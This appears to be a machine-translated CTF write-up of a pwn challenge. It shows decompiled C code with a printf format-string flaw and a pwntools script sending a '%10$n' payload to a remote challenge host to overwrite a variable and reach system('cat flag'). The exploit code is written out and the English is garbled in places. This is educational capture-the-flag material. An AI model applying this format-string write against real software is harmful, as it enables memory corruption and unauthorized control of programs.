This is regarded as a recurring problem, though chefs wp very detailed but imaginary dish for me sleepy, but still not really understand some point, it is hereby sort out ideas
int __cdecl main(int argc, const char **argv, const char **envp)
{
int buf; // [esp+1Eh] [ebp-7Eh]
int v5; // [esp+22h] [ebp-7Ah]
__int16 v6; // [esp+26h] [ebp-76h]
char s; // [esp+28h] [ebp-74h]
unsigned int v8; // [esp+8Ch] [ebp-10h]
v8 = __readgsdword(0x14u);
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
buf = 0;
V5 = 0;
v6 = 0;
memset(&s, 0, 0x64u);
puts("please tell me your name:");
read(0, &buf, 0xAu);
puts("leave your message please:");
fgets(&s, 100, stdin);
printf("hello %s", &buf);
puts("your message is:");
printf(&s);
if ( pwnme == 8 )
{
puts("you pwned me, here is your flag:\n");
system("cat flag");
}
else
{
puts("Thank you!");
}
return 0;
}
Read the pseudo code can be seen as long as pwnme == 8 on the line.
from pwn import * p = remote('111.198.29.45',34352) pwnme = 0x0804A068 payload1 = 'aaaa' payload2 = p32(pwnme) + 'aaaa%10$n' p.recvuntil('please tell me your name:\n') p.sendline(payload1) p.recvuntil('leave your message please:\n') p.sendline(payload2) print(p.recv()) print(p.recv()) # p.interactive()
% 10 $ n What does this mean? A: The XXX writing the offset address (4 bytes) stored pointer is pointing at 10 [here is where the length of a string (8 have constructed a length) of the written pwnme]
? Why offset 10 A: gdb debugger available (PS: Remember chmod 777 before commissioning)
Here entered by '21' with an offset address
p32 () function is what? A: pwntools provides a set of functions used to decode the data given and encoded in a certain format. These functions or p u is the beginning, followed by a number representing the number of bits, e.g. p32 and u32.
printf (& s) where s = 'haaaa% 10 $ n'
reference:
https://blog.csdn.net/zz_Caleb/article/details/88980866
https://adworld.xctf.org.cn/task/writeup?type=pwn&id=5050&number=2&grade=0&page=1